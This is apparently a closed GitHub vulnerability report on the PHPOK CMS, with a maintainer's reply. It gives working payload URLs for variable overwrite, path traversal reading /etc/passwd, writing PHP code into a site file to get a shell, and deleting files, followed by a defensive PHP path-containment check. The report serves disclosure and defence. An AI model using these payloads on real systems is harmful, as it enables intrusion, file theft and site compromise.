Closed Passer6y closed 5 years ago
Variable Overwrite Vulnerability
From the entrance of the framework, I discovered a parse_str variable overwrite in framework/init.php.
We could watch the $query_string parameter in framework/libs/server.php:
payload:
http://phpok/?data[script]=passer6y
Vulnerability to read arbitrary files
Back to framework/admin/tpl_control.php and framework/admin/appsys_control.php: there are two files that have this vulnerability.
payload1:
/admin.php?c=appsys&f=file_edit&id=fav&title=../../../../../../../etc/passwd
payload2:
/admin.php?c=tpl&f=edit&id=1&title=../../../../../../../etc/passwd
Arbitrary File Writing to getshell
The edit_save_f() function in framework/admin/tpl_control.php, line 383.
payload:
/admin.php?c=tpl&f=edit_save&id=1&title=../../../../../../../Users/passer6y/Documents/www/phpok/version.php&content=<%3fphp+phpinfo()%3becho+"passer6y"%3b%3f
Arbitrary file delete Vulnerability
The delfile_f() function in framework/admin/tpl_control.php, line 303:
payload:
/admin.php?c=tpl&f=delfile&id=1&title=../../../../../../../Users/passer6y/Documents/www/phpok/version.php
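The read, write and delete findings above all pass a title value containing ../ sequences to a file operation. The following is an added example, not PHPOK's own code and not part of the original report, of a containment check such a handler could apply before touching the file system; resolve_template_path(), the template root and the extension allowlist are assumptions made for illustration.

```php
<?php
declare(strict_types=1);

// Hypothetical helper (not a PHPOK function): resolve $title inside $root or throw.
function resolve_template_path(string $root, string $title, array $allowedExt = ['html', 'css', 'js']): string
{
    $rootReal = realpath($root);
    if ($rootReal === false || !is_dir($rootReal)) {
        throw new RuntimeException('template root does not exist');
    }
    // Reject empty names, NUL bytes and absolute paths outright.
    if ($title === '' || strpos($title, "\0") !== false || $title[0] === '/' || $title[0] === '\\') {
        throw new InvalidArgumentException('invalid file name');
    }
    // Assumed allowlist: keeps an edit_save-style write from creating or replacing .php files.
    $ext = strtolower(pathinfo($title, PATHINFO_EXTENSION));
    if (!in_array($ext, $allowedExt, true)) {
        throw new InvalidArgumentException('extension not allowed');
    }
    // realpath() fails for files that do not exist yet (the write case),
    // so canonicalise the parent directory and re-attach the base name.
    $candidate = $rootReal . DIRECTORY_SEPARATOR . $title;
    $dirReal = realpath(dirname($candidate));
    if ($dirReal === false) {
        throw new InvalidArgumentException('directory does not exist');
    }
    $full = $dirReal . DIRECTORY_SEPARATOR . basename($candidate);
    // Resolve an existing target (or symlink) too, so a link cannot point outside the root.
    if (file_exists($full) || is_link($full)) {
        $full = realpath($full);
    }
    // Compare with a trailing separator so /tpl-evil does not pass as /tpl.
    if ($full === false || strncmp($full, $rootReal . DIRECTORY_SEPARATOR, strlen($rootReal) + 1) !== 0) {
        throw new InvalidArgumentException('path escapes template root');
    }
    return $full;
}

// Constructed demo: a temporary template root holding one file.
$root = sys_get_temp_dir() . '/tpl_demo_' . bin2hex(random_bytes(4));
mkdir($root . '/1', 0700, true);
file_put_contents($root . '/1/index.html', '<h1>ok</h1>');
foreach (['1/index.html', '1/new.html', '../../../../etc/passwd', '1/../../x.html', '1/version.php'] as $title) {
    try {
        echo $title, ' => ', resolve_template_path($root, $title), PHP_EOL;
    } catch (InvalidArgumentException $e) {
        echo $title, ' => rejected: ', $e->getMessage(), PHP_EOL;
    }
}
```

The first two names resolve inside the root (the second does not exist yet, which is the write case); the other three are rejected, either by the extension allowlist or by the containment check.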
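Thank you for such a careful evaluation! Let us first clarify that in the back end, an administrator who is already logged in (currently the system administrator) has the highest privileges! Later on we will put certain restrictions on ordinary administrators. Thank you for your support.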